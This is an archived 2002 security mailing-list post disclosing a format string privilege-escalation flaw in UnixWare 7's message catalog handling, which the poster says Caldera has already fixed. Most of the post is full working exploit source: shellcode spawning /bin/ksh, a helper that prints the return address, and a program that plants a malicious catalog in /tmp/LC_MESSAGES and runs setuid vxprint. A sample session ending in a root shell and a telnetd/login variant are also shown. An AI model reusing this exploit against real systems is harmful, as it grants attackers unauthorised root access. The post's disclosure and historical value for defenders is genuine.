OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: jGgM. (jggmmail.com)
Date: Sat Feb 09 2002 - 21:27:05 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Hi, I'm jGgM.

    I was reported this problem Caldera, a few week ago.
    And, This exploit is fixed already.

    Hacker can modify message catalog and,
    It can possible format string exploit.

    for example)

    $ gcc -o expshell expshell.c
    $ gcc -o getret getret.c
    $ gcc -o fmt_exp fmt_exp.c
    $ ./expshell
    $ ./getret
    e=8047af7
    $ ./fmt_exp 0x8047af7 16 ( 16 is offset )
    ...........(wait 30 minutes ). ......

    # id
    uid=0(root) gid=3(sys) ......................

    This can exploit all of unixware 7 setuid/setgid
    command.

    Also, can exploit telnetd and login.

    example)
    $ telnet
    telnet> env def LC_MESSAGES /tmp
    telnet> o localhost
    Trying....
    .....
    login: blah blah..
    password: blah.. blash..
    ...... (wait 30 minutes.. )
    #

    ------------------------------------------------
    Korean security forum
    http://www.forsecure.com
    http://www.netemperor.com
    ------------------------------------------------

    Here is code.

    ------------------ expshell.c ------------------
    #include <stdio.h>

    char shellcode[]=
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\xeb\x1a" /* jmp <shellcode+28> */
        "\x33\xd2" /* xorl %edx,%edx */
        "\x58" /* popl %eax */
        "\x8d\x78\x14" /* leal 0x14(%eax),%edi */
        "\x57" /* pushl %edi */
        "\x50" /* pushl %eax */
        "\xab" /* stosl %eax,%es:(%edi) */
        "\x92" /* xchgl %eax,%edx */
        "\xab" /* stosl %eax,%es:(%edi) */
        "\x88\x42\x08" /* movb %al,0x8(%edx)
    */
        "\x83\xef\x3b" /* subl $0x3b,%edi */
        "\xb0\x9a" /* movb $0x9a,%al */
        "\xab" /* stosl %eax,%es:(%edi) */
        "\x47" /* incl %edi */
        "\xb0\x07" /* movb $0x07,%al */
        "\xab" /* stosl %eax,%es:(%edi) */
        "\xb0\x0b" /* movb $0x0b,%al */
        "\xe8\xe1\xff\xff\xff" /* call <shellcode+2> */
        "/bin/ksh"
    ;

    main(int argc, char *argv[])
    {
       char buff[1024];

       sprintf(buff, "EGG=%s", shellcode);
       putenv(buff);

       putenv("LC_MESSAGES=/tmp");
       system("/usr/bin/tcsh");
    }
    ---------------------------------------------------------------

    ---------------- getret.c --------------------
    main()
     {
     char *a;
     a = getenv("EGG");
     printf ("e=%p\n", a);
     }
    -----------------------------------------------

    ---------------- fmt_exp.c -----------------------------
    #include <stdio.h>
    #include "shellcode.h"

    /* This is base of format string return address */
    /* Base address of vxprint is 0x20c7c(134268) */
    #define BASE 134268

    main(int argc, char *argv[])
    {
       FILE *fp;
       char *retaddr;
       long g_len, offset;
       int count, count2, line=700, n=19;

       if(argc < 2 || argc > 3) {
          printf("Usage: %s ret-address offset\n", argv[0]);
          exit(1);
       }

       retaddr = argv[1];
       if(argc == 3) offset = atol(argv[2]);
       else offset = 0;

       g_len = strtol(retaddr, NULL, 16);
       g_len -= BASE;
       g_len += offset;

       fp = fopen("testdef", "w+");
       if(fp == NULL) {
          fprintf(stderr, "can not open file.\n"); exit(1);
       }
       for(count=0; count<line; count++) {
          for(count2=0; count2<n; count2++)
             fprintf(fp, "%%10x");
          fprintf(fp, "%%%dx%%n\n", g_len);
       }
       fclose(fp);

       remove("testout");
       system("mkmsgs testdef testout");
       mkdir("/tmp/LC_MESSAGES", 0755);
       system("mv
    testout /tmp/LC_MESSAGES/vxvm.mesg");

       printf("ret addr = 0x%x\n", g_len);
       /* this, also can any set uid command */
       execl("/usr/sbin/vxprint", "vxprint", "---", NULL);
    }
    ---------------------------------------------------------------